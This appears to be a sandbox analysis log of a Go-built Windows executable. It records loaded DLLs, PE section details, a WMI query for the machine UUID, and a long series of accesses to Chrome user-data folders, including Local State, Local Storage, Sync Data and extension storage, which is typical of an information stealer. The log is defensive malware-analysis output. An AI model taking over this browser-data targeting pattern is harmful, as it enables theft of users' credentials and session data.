Source: file.exeString found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: file.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 16807936 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x43fa00
Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x7d4000
Source: file.exeStatic PE information: Raw size of /65 is bigger than: 0x100000 < 0x118a00
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: section name: /4
Source: file.exeStatic PE information: section name: /19
Source: file.exeStatic PE information: section name: /32
Source: file.exeStatic PE information: section name: /46
Source: file.exeStatic PE information: section name: /65
Source: file.exeStatic PE information: section name: /78
Source: file.exeStatic PE information: section name: /90
Source: file.exeStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078D2A0 push es; retn 0000h0_2_0078D2A7
Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: file.exe, 00000000.00000002.1442133514.000000000185E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationGuidePredictionModels VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
